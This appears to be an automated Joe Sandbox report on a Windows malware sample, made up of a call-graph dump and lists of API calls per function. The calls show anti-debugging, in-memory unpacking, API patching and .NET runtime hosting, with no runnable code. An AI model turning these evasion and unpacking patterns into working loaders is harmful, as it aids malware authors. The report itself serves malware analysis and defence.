19158->19159 19160 41d7dc 19159->19160 19161 41d822 19160->19161 19170 416943 EnterCriticalSection 19160->19170 19161->19150 19163 41d7fa 19170->19163 19179 417942 __cftof 37 API calls 19178->19179 19180 41c5c0 19179->19180 19183 41c4ce 19180->19183 19184 41c4da ___scrt_is_nonwritable_in_current_image 19183->19184 19199 422400 19194->19199 19195 4111f2 _ValidateLocalCookies 5 API calls 19197 42257e 19195->19197 19197->19137 19198 422425 19198->19195 19199->19198 19200 41fb71 19199->19200 19201 413c57 _free 14 API calls 19200->19201 19202 41fb85 19201->19202 19202->19198 19203->18938 19205 417097 ___scrt_is_nonwritable_in_current_image 19204->19205 19215 418732 EnterCriticalSection 19205->19215 19207 4170a5 19208 4170d7 19207->19208 19209 4170cc 19207->19209 19211 413c57 _free 14 API calls 19208->19211 19216 4171a4 19209->19216 19212 4170d2 19211->19212 19231 41710b 19212->19231 19215->19207 19217 4189ae __wsopen_s 25 API calls 19216->19217 19220 4171b4 19217->19220 19218 4171ba 19234 41891d 19218->19234 19220->19218 19223 4189ae __wsopen_s 25 API calls 19220->19223 19230 4171ec 19220->19230 19221 4189ae __wsopen_s 25 API calls 19225 4171f8 CloseHandle 19221->19225 19224 4171e3 19223->19224 19227 4189ae __wsopen_s 25 API calls 19224->19227 19225->19218 19228 417204 GetLastError 19225->19228 19226 417234 19226->19212 19227->19230 19228->19218 19229 413c21 __dosmaperr 14 API calls 19229->19226 19230->19218 19230->19221 19243 4187e7 LeaveCriticalSection 19231->19243 19233 4170f4 19233->18861 19235 418993 19234->19235 19236 41892c 19234->19236 19237 413c57 _free 14 API calls 19235->19237 19236->19235 19242 418956 __wsopen_s 19236->19242 19238 418998 19237->19238 19239 413c44 __dosmaperr 14 API calls 19238->19239 19240 417212 19239->19240 19240->19226 19240->19229 19241 41897d SetStdHandle 19241->19240 19242->19240 19242->19241 19243->19233 19244->18830 19246 4153e1 ___scrt_is_nonwritable_in_current_image 19245->19246 19247 4153d0 19246->19247 19248 4153f4 ___scrt_fastfail 19246->19248 19249 41542b 19246->19249 19247->18601 19252 413c57 _free 14 API calls 19248->19252 19258 416af7 EnterCriticalSection 19249->19258 19251 415435 19259 4151d2 19251->19259 19254 41540e 19252->19254 19256 41569f __cftof 25 API calls 19254->19256 19256->19247 19258->19251 19263 4151e3 ___scrt_fastfail 19259->19263 19271 4151ff 19259->19271 19260 4151ef 19261 413c57 _free 14 API calls 19260->19261 19262 4151f4 19261->19262 19264 41569f __cftof 25 API calls 19262->19264 19263->19260 19268 415241 __fread_nolock 19263->19268 19263->19271 19264->19271 19265 415368 ___scrt_fastfail 19269 413c57 _free 14 API calls 19265->19269 19266 417240 __fread_nolock 25 API calls 19266->19268 19268->19265 19268->19266 19268->19271 19275 415472 19268->19275 19289 41b29a 19268->19289 19269->19262 19272 41546a 19271->19272 19387 416b0b LeaveCriticalSection 19272->19387 19274 415470 19274->19247 19276 415483 19275->19276 19279 41547f __fread_nolock 19275->19279 19277 41548a 19276->19277 19281 41549d ___scrt_fastfail 19276->19281 19278 413c57 _free 14 API calls 19277->19278 19280 41548f 19278->19280 19279->19268 19282 41569f __cftof 25 API calls 19280->19282 19281->19279 19283 4154cb 19281->19283 19285 4154d4 19281->19285 19282->19279 19284 413c57 _free 14 API calls 19283->19284 19286 4154d0 19284->19286 19285->19279 19287 413c57 _free 14 API calls 19285->19287 19288 41569f __cftof 25 API calls 19286->19288 19287->19286 19288->19279 19290 41b2c4 19289->19290 19291 41b2ac 19289->19291 19293 41b62b 19290->19293 19298 41b304 19290->19298 19292 413c44 __dosmaperr 14 API calls 19291->19292 19294 41b2b1 19292->19294 19295 413c44 __dosmaperr 14 API calls 19293->19295 19296 413c57 _free 14 API calls 19294->19296 19297 41b630 19295->19297 19299 41b2b9 19296->19299 19300 413c57 _free 14 API calls 19297->19300 19298->19299 19301 41b30f 19298->19301 19305 41b33e 19298->19305 19299->19268 19302 41b31c 19300->19302 19303 413c44 __dosmaperr 14 API calls 19301->19303 19306 41569f __cftof 25 API calls 19302->19306 19304 41b314 19303->19304 19307 413c57 _free 14 API calls 19304->19307 19308 41b357 19305->19308 19309 41b372 19305->19309 19310 41b3ae 19305->19310 19306->19299 19307->19302 19308->19309 19311 41b35c 19308->19311 19312 413c44 __dosmaperr 14 API calls 19309->19312 19354 41753a 19310->19354 19317 41f686 __fread_nolock 25 API calls 19311->19317 19314 41b377 19312->19314 19316 413c57 _free 14 API calls 19314->19316 19319 41b37e 19316->19319 19320 41b505 19317->19320 19318 417051 _free 14 API calls 19321 41b3ce 19318->19321 19322 41569f __cftof 25 API calls 19319->19322 19323 41b57b 19320->19323 19324 41b51e GetConsoleMode 19320->19324 19325 417051 _free 14 API calls 19321->19325 19351 41b389 __fread_nolock 19322->19351 19326 41b57f ReadFile 19323->19326 19324->19323 19327 41b52f 19324->19327 19328 41b3d5 19325->19328 19329 41b5f3 GetLastError 19326->19329 19330 41b599 19326->19330 19327->19326 19331 41b535 ReadConsoleW 19327->19331 19332 41b3fa 19328->19332 19333 41b3df 19328->19333 19334 41b600 19329->19334 19335 41b557 19329->19335 19330->19329 19336 41b570 19330->19336 19331->19336 19338 41b551 GetLastError 19331->19338 19337 41f87f __fread_nolock 27 API calls 19332->19337 19340 413c57 _free 14 API calls 19333->19340 19341 413c57 _free 14 API calls 19334->19341 19343 413c21 __dosmaperr 14 API calls 19335->19343 19335->19351 19346 41b5d5 19336->19346 19347 41b5be 19336->19347 19336->19351 19337->19311 19338->19335 19339 417051 _free 14 API calls 19339->19299 19344 41b3e4 19340->19344 19342 41b605 19341->19342 19345 413c44 __dosmaperr 14 API calls 19342->19345 19343->19351 19345->19351 19350 41b5ec 19346->19350 19346->19351 19361 41afb4 19347->19361 19374 41ade3 19350->19374 19351->19339 19355 417578 19354->19355 19359 417548 _free 19354->19359 19357 413c57 _free 14 API calls 19355->19357 19356 417563 RtlAllocateHeap 19358 417576 19356->19358 19356->19359 19357->19358 19358->19318 19359->19355 19359->19356 19360 41571a _free 2 API calls 19359->19360 19360->19359 19379 41ac82 19361->19379 19377 41ae1e 19374->19377 19387->19274 19389 413968 ___scrt_is_nonwritable_in_current_image 19388->19389 19396 416af7 EnterCriticalSection 19389->19396 19391 413976 19397 4139b7 19391->19397 19396->19391 19407 419b65 19397->19407 19404 4139ab 19431 416b0b LeaveCriticalSection 19404->19431 19406 413994 19406->18601 19408 417240 __fread_nolock 25 API calls 19407->19408 19409 419b76 19408->19409 19410 41f686 __fread_nolock 25 API calls 19409->19410 19412 419b7c 19410->19412 19411 4139cb 19416 4139fa 19411->19416 19412->19411 19413 41753a __fread_nolock 15 API calls 19412->19413 19414 419bd7 19413->19414 19415 417051 _free 14 API calls 19414->19415 19415->19411 19418 413a0c 19416->19418 19422 4139e6 19416->19422 19417 413a1a 19419 413c57 _free 14 API calls 19417->19419 19418->19417 19418->19422 19425 413a42 __fread_nolock 19418->19425 19420 413a1f 19419->19420 19421 41569f __cftof 25 API calls 19420->19421 19421->19422 19427 419c18 19422->19427 19423 417484 ___scrt_uninitialize_crt 62 API calls 19423->19425 19424 417240 __fread_nolock 25 API calls 19424->19425 19425->19422 19425->19423 19425->19424 19426 419620 __wsopen_s 62 API calls 19425->19426 19426->19425 19428 413983 19427->19428 19429 419c23 19427->19429 19428->19404 19429->19428 19430 417484 ___scrt_uninitialize_crt 62 API calls 19429->19430 19430->19428 19431->19406 22150 41cd7a 22151 41cd93 22150->22151 22152 41cdb1 22150->22152 22151->22152 22153 418e1b 30 API calls 22151->22153 22153->22151 19458 7fe4344e lstrcmpiA 19459 7fe43461 19458->19459 19460 7fe43469 LoadLibraryA 19458->19460 20276 403fb0 20277 403fb6 20276->20277 20278 412e34 28 API calls 20277->20278 20279 403fc3 20278->20279 20280 403fd6 20279->20280 20281 412ec2 67 API calls 20279->20281 20282 403fd0 20281->20282 20362 7fe42018 20363 7fe42032 20362->20363 20364 7fe4208a 20363->20364 20370 7fe4208f GetPEB 20363->20370 20366 7fe4203e 20366->20364 20372 7fe42233 GetModuleHandleA GetProcAddress 20366->20372 20371 7fe420ae 20370->20371 20371->20366 20373 7fe4227d 20372->20373 20374 7fe42263 GetCurrentProcess NtQueryInformationProcess 20372->20374 20375 7fe42071 SetErrorMode 20373->20375 20376 7fe4228b GetModuleHandleA GetProcAddress 20373->20376 20374->20373 20378 7fe4168c 20375->20378 20391 7fe41e0e GetModuleHandleA GetProcAddress 20376->20391 20411 7fe42459 20378->20411 20381 7fe416cc 20470 7fe416d7 GetModuleHandleA 20381->20470 20390 7fe416c3 20467 7fe4256c 20390->20467 20392 7fe41ea9 20391->20392 20393 7fe41e36 20391->20393 20392->20375 20393->20392 20395 7fe41e81 20393->20395 20397 7fe411b0 memset 20393->20397 20395->20392 20399 7fe41ef2 GetProcAddress 20395->20399 20398 7fe411dc 20397->20398 20398->20393 20400 7fe41f0a 20399->20400 20401 7fe41f6b 20399->20401 20400->20401 20406 7fe41f70 20400->20406 20401->20392 20404 7fe41f33 VirtualProtect 20404->20401 20405 7fe41f4e InterlockedExchange VirtualProtect 20404->20405 20405->20401 20407 7fe41f25 20406->20407 20409 7fe41f8f 20406->20409 20407->20401 20407->20404 20408 7fe411b0 memset 20408->20409 20409->20407 20409->20408 20410 7fe41f70 memset 20409->20410 20410->20409 20412 7fe42470 20411->20412 20413 7fe4169c 20411->20413 20412->20413 20414 7fe424ea calloc 20412->20414 20413->20381 20413->20390 20421 7fe42d84 memset memset 20413->20421 20414->20413 20415 7fe424fb 20414->20415 20476 7fe422d6 20415->20476 20418 7fe4255a free 20418->20413 20419 7fe4252f malloc 20419->20418 20420 7fe42544 memcpy 20419->20420 20420->20418 20480 7fe4257f lstrlen 20421->20480 20423 7fe416b1 20424 7fe41755 20423->20424 20425 7fe4257f lstrlen 20424->20425 20431 7fe41777 20425->20431 20426 7fe418c2 20427 7fe416b8 20426->20427 20482 7fe4194a 20426->20482 20434 7fe42dd5 20427->20434 20430 7fe41804 strncmp 20430->20431 20431->20426 20431->20430 20432 7fe41868 malloc 20431->20432 20432->20431 20433 7fe41879 memcpy 20432->20433 20433->20431 20435 7fe42df0 20434->20435 20449 7fe42e35 20434->20449 20436 7fe42df9 GetModuleHandleA 20435->20436 20438 7fe43162 20435->20438 20492 7fe432d4 20436->20492 20440 7fe43198 VirtualAlloc 20438->20440 20438->20449 20443 7fe431bf memcpy 20440->20443 20440->20449 20441 7fe42e11 20444 7fe42e18 HeapDestroy 20441->20444 20445 7fe42e2a 20441->20445 20442 7fe42e3c 20447 7fe42e5b IsBadReadPtr 20442->20447 20442->20449 20448 7fe431d8 20443->20448 20458 7fe4320b 20443->20458 20444->20445 20502 7fe436d4 CoInitializeEx 20445->20502 20447->20449 20450 7fe42e6d VirtualProtect memcpy VirtualProtect 20447->20450 20452 7fe431e4 memcpy 20448->20452 20448->20458 20449->20390 20451 7fe42eb4 20450->20451 20456 7fe42f1e 20450->20456 20454 7fe42eba VirtualProtect memset 20451->20454 20451->20456 20452->20448 20453 7fe432c2 VirtualFree 20453->20449 20454->20451 20455 7fe42ef5 memcpy 20454->20455 20455->20451 20462 7fe42f9f 20456->20462 20463 7fe42f7d GetTickCount 20456->20463 20457 7fe43089 VirtualAlloc 20457->20449 20459 7fe430a4 9 API calls 20457->20459 20458->20453 20464 7fe4326f GetTickCount 20458->20464 20466 7fe4327e 20458->20466 20459->20449 20460 7fe43058 20460->20449 20460->20457 20461 7fe43030 VirtualProtect 20461->20460 20461->20462 20462->20460 20462->20461 20465 7fe42f8c 20463->20465 20464->20466 20465->20462 20466->20453 20468 7fe42573 free 20467->20468 20469 7fe4257e 20467->20469 20468->20469 20469->20381 20471 7fe416d2 20470->20471 20472 7fe416ec GetProcAddress 20470->20472 20471->20364 20473 7fe41724 GetProcAddress 20472->20473 20474 7fe41707 VirtualProtect VirtualProtect 20472->20474 20473->20471 20475 7fe41733 VirtualProtect VirtualProtect 20473->20475 20474->20473 20475->20471 20477 7fe4236b 20476->20477 20478 7fe422e9 20476->20478 20477->20418 20477->20419 20478->20477 20479 7fe42351 memcpy 20478->20479 20479->20478 20481 7fe425a7 20480->20481 20481->20423 20483 7fe4257f lstrlen 20482->20483 20485 7fe41965 20483->20485 20484 7fe418fb free 20484->20426 20484->20427 20485->20484 20486 7fe41998 VirtualAlloc 20485->20486 20486->20484 20487 7fe419b3 memcpy 20486->20487 20488 7fe419d5 20487->20488 20491 7fe41a05 20487->20491 20489 7fe419de memcpy 20488->20489 20488->20491 20489->20488 20490 7fe41a45 VirtualFree 20490->20484 20491->20490 20493 7fe42e0c 20492->20493 20494 7fe432f3 20492->20494 20493->20441 20493->20442 20494->20493 20495 7fe43310 GetProcessHeap RtlAllocateHeap 20494->20495 20495->20493 20496 7fe43330 memcpy 20495->20496 20497 7fe43381 IsBadReadPtr 20496->20497 20498 7fe43352 20496->20498 20499 7fe433a2 HeapFree 20497->20499 20500 7fe4339b 20497->20500 20498->20497 20501 7fe4335b memcpy 20498->20501 20499->20493 20500->20499 20501->20498 20503 7fe436ef 20502->20503 20507 7fe43931 20502->20507 20503->20507 20522 7fe43663 LoadLibraryW 20503->20522 20506 7fe4376d SafeArrayCreate 20506->20507 20508 7fe4378e memcpy 20506->20508 20507->20449 20509 7fe437c4 20508->20509 20510 7fe4392a SafeArrayDestroy 20509->20510 20511 7fe43811 SafeArrayGetLBound 20509->20511 20516 7fe43915 20509->20516 20510->20507 20512 7fe438b3 20511->20512 20513 7fe43828 SafeArrayGetUBound 20511->20513 20512->20516 20517 7fe43905 SafeArrayDestroy SafeArrayDestroy 20512->20517 20513->20512 20514 7fe4383f 20513->20514 20514->20512 20515 7fe4384c GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 20514->20515 20518 7fe438b5 SafeArrayCreateVector SysAllocString SafeArrayPutElement 20515->20518 20519 7fe43876 20515->20519 20516->20510 20517->20516 20518->20512 20519->20518 20520 7fe4387b SafeArrayCreateVector 20519->20520 20520->20512 20521 7fe4388e SysAllocString SafeArrayPutElement 20520->20521 20521->20512 20521->20521 20523 7fe4367d 20522->20523 20530 7fe436af 20522->20530 20533 7fe434af 20523->20533 20526 7fe434af 5 API calls 20527 7fe43698 20526->20527 20528 7fe4369f 20527->20528 20529 7fe436b9 20527->20529 20541 7fe43586 GetProcAddress 20528->20541 20529->20530 20543 7fe43629 GetProcAddress 20529->20543 20530->20506 20530->20507 20534 7fe434c3 20533->20534 20535 7fe434ca 20533->20535 20534->20526 20535->20534 20536 7fe434d7 GetProcAddress GetProcAddress GetProcAddress 20535->20536 20536->20534 20537 7fe43506 20536->20537 20537->20534 20538 7fe43516 wcscmp 20537->20538 20538->20534 20539 7fe4352d 20538->20539 20539->20534 20540 7fe4353f wcscmp 20539->20540 20540->20534 20542 7fe435a6 20541->20542 20542->20530 20544 7fe4363f 20543->20544 20544->20530

                                                                                  Executed Functions

                                                                                  Function 00401F40 Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00401F6A
                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00401F7F
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401F82
                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00401F90
                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401FB3
                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00401FBE
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401FC1
                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00401FD1
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401FD4
                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401FFE
                                                                                  • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402011
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004020A2
                                                                                  • HeapFree.KERNEL32(00000000), ref: 004020AB
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004020B0
                                                                                  • HeapFree.KERNEL32(00000000), ref: 004020B3
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004020BA
                                                                                  • HeapFree.KERNEL32(00000000), ref: 004020BD
                                                                                  • LocalFree.KERNEL32(00000000), ref: 004020C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                  • String ID:
                                                                                  • API String ID: 3326663573-0
                                                                                  • Opcode ID: 2f31ebec3fe9f8993efa4e5ebf62337cafbb00ec17dfdc0651c846f209d830ad
                                                                                  • Instruction ID: 1fdb30066f43f3f59f6a83a22fe7b12dcdb6b628cd19f67903b76f141601f4a5
                                                                                  • Opcode Fuzzy Hash: 2f31ebec3fe9f8993efa4e5ebf62337cafbb00ec17dfdc0651c846f209d830ad
                                                                                  • Instruction Fuzzy Hash: 1E516175E00219AFEB109FA5CD88FAFBB7CEF44344F05416AE905E3281DA749E05CBA4
                                                                                  Function 7FE42233 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 47libraryloadernativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                  • GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                  • NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentInformationQuery
                                                                                  • String ID: ZwQueryInformationProcess$ntdll$ntdll.dll
                                                                                  • API String ID: 460765316-442758927
                                                                                  • Opcode ID: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction ID: c43e8887edb143a630375315b9d9582e51a2876b0aac7502fde47bf8d8371ccf
                                                                                  • Opcode Fuzzy Hash: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction Fuzzy Hash: 7B01D67BE0030CBBEB0097E5AC49FBE7BBCEB88265F24011AF901E3040D674DA158B64
                                                                                  Function 00412C11 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00412C10,?,?,?,?,?,00413CC2), ref: 00412C33
                                                                                  • TerminateProcess.KERNEL32(00000000,?,00412C10,?,?,?,?,?,00413CC2), ref: 00412C3A
                                                                                  • ExitProcess.KERNEL32 ref: 00412C4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: e04fff1fcd62ed4c0ec845f691e2175282aea113ede7df89dcb23ddb00460aeb
                                                                                  • Instruction ID: de05ac795346e79980b6987cd1a2e8e64cd183bf83a2b0c727bf905c418a36bc
                                                                                  • Opcode Fuzzy Hash: e04fff1fcd62ed4c0ec845f691e2175282aea113ede7df89dcb23ddb00460aeb
                                                                                  • Instruction Fuzzy Hash: 8AE04F31101544AFCF252B15CE09A9E3B68FF00341B444029F904C6131DB79DDA3CA88
                                                                                  Function 7FE42DD5 Relevance: 56.4, APIs: 26, Strings: 6, Instructions: 420memorylibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7fe42dd5-7fe42dea 1 7fe42df0-7fe42df3 0->1 2 7fe432cf-7fe432d3 0->2 3 7fe43162-7fe4316f 1->3 4 7fe42df9-7fe42e0f GetModuleHandleA call 7fe432d4 1->4 3->2 5 7fe43175-7fe43186 3->5 10 7fe42e11-7fe42e16 4->10 11 7fe42e3c-7fe42e44 4->11 5->2 7 7fe4318c-7fe43192 5->7 7->2 9 7fe43198-7fe431b9 VirtualAlloc 7->9 9->2 13 7fe431bf-7fe431d6 memcpy 9->13 14 7fe42e18-7fe42e28 HeapDestroy 10->14 15 7fe42e2a-7fe42e37 call 7fe436d4 10->15 11->2 12 7fe42e4a-7fe42e55 11->12 12->2 17 7fe42e5b-7fe42e67 IsBadReadPtr 12->17 18 7fe4320d-7fe43220 call 7fe41b03 13->18 19 7fe431d8-7fe431db 13->19 14->15 15->2 17->2 21 7fe42e6d-7fe42eb2 VirtualProtect memcpy VirtualProtect 17->21 29 7fe43226-7fe43244 call 7fe41c64 18->29 30 7fe432c2-7fe432c9 VirtualFree 18->30 22 7fe431de-7fe431e2 19->22 24 7fe42eb4-7fe42eb7 21->24 25 7fe42f21-7fe42f29 21->25 26 7fe431e4-7fe431f9 memcpy 22->26 27 7fe431fc-7fe43209 22->27 31 7fe42eba-7fe42ef3 VirtualProtect memset 24->31 32 7fe42f3c-7fe42f52 call 7fe41c64 25->32 33 7fe42f2b-7fe42f39 call 7fe41b03 25->33 26->27 27->22 34 7fe4320b 27->34 29->30 46 7fe43246-7fe4324e 29->46 30->2 37 7fe42ef5-7fe42f0c memcpy 31->37 38 7fe42f0f-7fe42f1c 31->38 44 7fe42f54-7fe42f5c 32->44 45 7fe42f9f-7fe42fb0 32->45 33->32 34->18 37->38 38->31 42 7fe42f1e 38->42 42->25 44->45 47 7fe42f5e-7fe42f64 44->47 50 7fe42fb6-7fe42fb9 45->50 51 7fe4305b-7fe43063 45->51 48 7fe43250-7fe43256 46->48 49 7fe43293-7fe4329b 46->49 47->45 54 7fe42f66-7fe42f6b 47->54 48->49 55 7fe43258-7fe4325d 48->55 52 7fe432b6-7fe432b9 49->52 53 7fe4329d-7fe432a3 49->53 58 7fe42fbe-7fe42fdc 50->58 56 7fe43065-7fe4306b 51->56 57 7fe4307f-7fe43083 51->57 52->30 64 7fe432bb-7fe432be 52->64 53->52 61 7fe432a5-7fe432a9 53->61 54->45 63 7fe42f6d-7fe42f72 54->63 55->49 65 7fe4325f-7fe43264 55->65 56->57 66 7fe4306d-7fe43071 56->66 57->2 62 7fe43089-7fe4309e VirtualAlloc 57->62 59 7fe42fe7-7fe42ff5 58->59 60 7fe42fde-7fe42fe5 58->60 68 7fe42ff7-7fe42ffe 59->68 69 7fe43000-7fe43008 59->69 67 7fe43021-7fe4302a 60->67 61->52 70 7fe432ab-7fe432b4 61->70 62->2 71 7fe430a4-7fe4315d GetModuleHandleA RtlCaptureContext memcpy * 2 GetProcessHeap GetModuleHandleA GetProcAddress * 3 62->71 63->45 72 7fe42f74-7fe42f7b 63->72 64->30 73 7fe43266-7fe4326d 65->73 74 7fe43291 65->74 66->57 75 7fe43073-7fe4307d 66->75 77 7fe43030-7fe43052 VirtualProtect 67->77 78 7fe4302c 67->78 68->67 69->68 76 7fe4300a-7fe43018 69->76 70->61 71->2 72->45 79 7fe42f7d-7fe42f8a GetTickCount 72->79 73->74 80 7fe4326f-7fe4327c GetTickCount 73->80 74->49 75->66 76->67 82 7fe4301a 76->82 77->58 85 7fe43058 77->85 78->77 83 7fe42f91-7fe42f96 79->83 84 7fe42f8c 79->84 86 7fe43283-7fe43288 80->86 87 7fe4327e 80->87 82->67 89 7fe42f9c 83->89 90 7fe42f98-7fe42f9a 83->90 84->83 85->51 91 7fe4328e 86->91 92 7fe4328a-7fe4328c 86->92 87->86 93 7fe42f9d 89->93 90->89 90->93 94 7fe4328f 91->94 92->91 92->94 93->45 94->74
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,7FE4208A), ref: 7FE42DFB
                                                                                    • Part of subcall function 7FE432D4: GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                    • Part of subcall function 7FE432D4: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(00000000,02263E58,?), ref: 7FE4333F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(?,02263E58,00000000), ref: 7FE4336A
                                                                                    • Part of subcall function 7FE432D4: IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                    • Part of subcall function 7FE432D4: HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  • HeapDestroy.KERNEL32(?), ref: 7FE42E1A
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE42E5F
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000), ref: 7FE42E88
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE42E94
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000000,00000000), ref: 7FE42EA7
                                                                                  • VirtualProtect.KERNELBASE(?,0000010A,00000004,00000000), ref: 7FE42ED7
                                                                                  • memset.NTDLL ref: 7FE42EE7
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE42F07
                                                                                  • GetTickCount.KERNEL32 ref: 7FE42F7D
                                                                                  • VirtualProtect.KERNELBASE(?,?,00000020,00000000), ref: 7FE4303F
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 7FE43094
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 7FE430A9
                                                                                  • RtlCaptureContext.NTDLL(0000040C), ref: 7FE430C2
                                                                                  • memcpy.NTDLL(00000000,7FE452E4,00000011), ref: 7FE430D0
                                                                                  • memcpy.NTDLL(00000011,7FE433D2,000003EF,00000000,7FE452E4,00000011), ref: 7FE430E3
                                                                                  • GetProcessHeap.KERNEL32 ref: 7FE43103
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwContinue), ref: 7FE4312D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4313A
                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualFree), ref: 7FE43146
                                                                                  • GetProcAddress.KERNEL32(00000000,HeapDestroy), ref: 7FE43153
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000040,00000000,7FE4208A), ref: 7FE431AF
                                                                                  • memcpy.NTDLL(00000000,7FE453D8,?), ref: 7FE431C5
                                                                                  • memcpy.NTDLL(?,?,?), ref: 7FE431F4
                                                                                  • GetTickCount.KERNEL32 ref: 7FE4326F
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7FE432C9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$Virtual$Heap$Protect$AddressHandleModuleProc$AllocCountFreeProcessReadTick$AllocateCaptureContextDestroymemset
                                                                                  • String ID: $HeapDestroy$VirtualFree$ZwContinue$kernel32.dll$ntdll.dll
                                                                                  • API String ID: 1144457544-3596324431
                                                                                  • Opcode ID: 4b231ea1ca43c35110b809eeefee1f5c8187e956e1b50f4f7dd18bab82f44ae4
                                                                                  • Instruction ID: 732545531038e7714358bfe6ab87001606b6185c74c7238915c452f030bfd5c1
                                                                                  • Opcode Fuzzy Hash: 4b231ea1ca43c35110b809eeefee1f5c8187e956e1b50f4f7dd18bab82f44ae4
                                                                                  • Instruction Fuzzy Hash: 62F1CC76A00305AFDB21CFA5DC84BAAB7BAFF44348F10552DF906AB241D734E994EB50
                                                                                  Function 7FE319AC Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 186COMMON
                                                                                  Download Yara Rule
